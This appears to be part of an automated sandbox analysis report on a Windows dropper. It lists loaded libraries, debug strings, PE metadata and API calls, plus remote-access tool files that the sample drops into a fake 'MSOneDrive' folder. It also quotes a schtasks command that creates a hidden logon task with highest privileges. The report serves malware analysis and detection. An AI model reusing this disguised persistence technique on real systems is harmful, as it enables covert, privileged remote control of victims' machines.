                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: mswsock.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: winnsi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: dnsapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: rasadhlp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: fwpuclnt.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: schannel.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: mskeyprotect.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: ntasn1.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: dpapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: cryptsp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: rsaenh.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: cryptbase.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: gpapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: ncrypt.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: ncryptsslp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: dlnashext.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: wpdshext.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcichek.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: netapi32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: samcli.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: dbghelp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: dbgcore.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: devobj.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcihooks.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winsta.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: riched32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: riched20.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: usp10.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msls31.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pciinv.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: firewallapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: fwbase.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: napinsp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: fwpolicyiomgr.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pnrpnsp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wshbth.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: nlaapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winrnr.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: firewallapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: fwbase.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: fwpolicyiomgr.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcicl32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: shfolder.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcichek.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: pcicapi.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: mpr.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: version.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: winmm.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: netapi32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wininet.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msvcr100.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: samcli.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: wtsapi32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: nsmtrace.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: devobj.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | Section loaded: msasn1.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | File opened: C:\Windows\SysWOW64\riched32.dll
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe | File opened: C:\Users\user\AppData\Local\MSOneDrive\MSVCR100.dll
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: ir41_qcx.pdb source: ir41_qcx.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 0000000B.00000002.3755622548.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000D.00000002.1392811349.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.3.dr
                                Source: Binary string: ir50_32.pdb source: ir50_32.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr
                                Source: Binary string: stub.pdbGCTL source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: icmp.pdbGCTL source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: smalldll.pdbGCTL source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.3.dr
                                Source: Binary string: icmp.pdb source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: winrssrv.pdbGCTL source: winrssrv.dll.3.dr
                                Source: Binary string: wiatrace.pdb source: wiatrace.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 0000000B.00000002.3755499542.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 0000000D.00000002.1392710495.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.3.dr
                                Source: Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe.3.dr
                                Source: Binary string: smalldll.pdb source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr
                                Source: Binary string: winrssrv.pdb source: winrssrv.dll.3.dr
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.3755290602.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.1392381174.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.3.dr
                                Source: Binary string: ir50_32.pdbGCTL source: ir50_32.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: wiatrace.pdbUGP source: wiatrace.dll.3.dr
                                Source: Binary string: WFAPIGP.pdb source: wfapigp.dll.3.dr
                                Source: Binary string: WerEnc.pdb source: WerEnc.dll.3.dr
                                Source: Binary string: stub.pdb source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: GetUName.pdbGCTL source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.3.dr
                                Source: Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.3.dr
                                Source: Binary string: GetUName.pdb source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.3.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.3.dr
                                Source: Binary string: WerEnc.pdbGCTL source: WerEnc.dll.3.dr
                                Source: Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.3.dr
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                Source: UIManagerBrokerps.dll.3.dr Static PE information: 0xF03077F1 [Wed Sep 11 03:24:33 2097 UTC]
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11081000 LoadLibraryA,LoadLibraryA,GetModuleFileNameA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_11081000
                                Source: HTCTL32.DLL.3.dr Static PE information: real checksum: 0x4fbb5 should be: 0x525c4
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: real checksum: 0x0 should be: 0x298fc
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Static PE information: section name: .config
                                Source: wfapigp.dll.3.dr Static PE information: section name: .didat
                                Source: PCICL32.DLL.3.dr Static PE information: section name: .hhshare
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Code function: 3_2_00C97F81 push ecx; ret 3_2_00C97F94
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_1115DA35 push ecx; ret 11_2_1115DA48
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11158929 push ecx; ret 11_2_1115893C
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_6C83492F push ecx; ret 11_2_6C834942
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_1115DA35 push ecx; ret 13_2_1115DA48
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11158929 push ecx; ret 13_2_1115893C
                                Source: msvcr100.dll.3.dr Static PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\dpnathlp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\WerEnc.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\msvcp140_codecvt_ids.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\msvcr100.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\PCICL32.DLL
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\dpnhupnp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLL
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\winrssrv.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\client32.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\dxmasf.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\dpnlobby.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\winrsmgr.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\msvcr100_clr0400.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\getuname.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLL
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\icmp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\wiatrace.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\ir41_qcx.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\remcmdstub.exe
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\wfapigp.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\ir50_32.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\UIManagerBrokerps.dll
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe File created: C:\Users\user\AppData\Local\MSOneDrive\HTCTL32.DLL
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_6C815690 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,11_2_6C815690
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_6C803C17 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,11_2_6C803C17
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_6C803F90 GetPrivateProfileIntA,11_2_6C803F90
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_6C815A28 GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,11_2_6C815A28

                                Boot Survival

                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11119810 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11119810
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,11_2_11129D80
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11023040
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110B7590
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_11149BF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11105AE0 IsIconic,11_2_11105AE0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110C1C00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_11149FF0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_11024350
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_11114780
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_110247A0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_111066E0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 11_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_11022970
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11023040
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exe Code function: 13_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,13_2_110B7590
